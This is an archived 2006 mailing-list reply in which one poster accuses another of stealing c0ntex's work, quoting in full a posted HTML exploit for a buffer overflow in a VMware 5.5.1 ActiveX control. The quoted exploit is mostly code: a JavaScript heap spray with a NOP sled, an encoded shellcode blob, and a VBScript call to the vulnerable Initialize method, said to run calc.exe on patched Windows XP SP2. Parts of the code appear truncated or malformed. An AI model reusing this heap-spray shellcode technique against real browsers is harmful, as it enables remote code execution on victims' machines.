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Re: VMware 5.5.1 Local Buffer Overflow (HTML Exploit)

NormandiaN the code theif,

c0ntex discovered this and released it August 18th 2006, which you
pretty much stole everything line for line.  Nice job.



On 26 Nov 2006 06:05:34 -0000, NormandiaN_MailID@xxxxxxxxx
<NormandiaN_MailID@xxxxxxxxx> wrote:
<title>WinXP Pro SP2 lame local VMWare Buffer Overflow</title>
Discovered By NormandiaN<br>
Visit my website at http://www.grisapka.org<br>
This will exploit overflow and execute calc.exe on WinXP Pro SP2<br>
(fully patched) against VMWare 5.5.1 Initialize ActiveX member.<br>
I have only found a bad solution to this bug. Due to the fact that<br>
my controlling assembler is a call dword ptr[reg] I need to point<br>
to a location I control, fine. However my payload is random pretty<br>
much every run. Therefor I fill half a HUGE  buffer with the address<br>
(pointer) to my evil buffer, which them trampolines me to shellcode<br>
call ptr [reg]<br>
[reg] -> 0xtrampoline<br>
0xtrampoline -> shellcode<br>
var buffa1 = unescape("%uedb0%u0d91")
do {
buffa1 += buffa1;
while (buffa1.length < 0x500000);
var buffa2 = unescape("%u9090%u9090")
do {
buffa2 += buffa2;
while (buffa2.length < 0x800000);
buffa1 += buffa2;
buffa1 += unescape("%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474" +
"%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" +
"%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" +
"%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" +
"%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" +
"%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" +
"%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" +
"%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" +
"%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" +
"%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" +
"%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" +
<object id="target" classid="clsid:F76E4799-379B-4362-BCC4-68B753D10744">
<script language="vbscript">
target.Initialize VmdbDb, VmdbPoll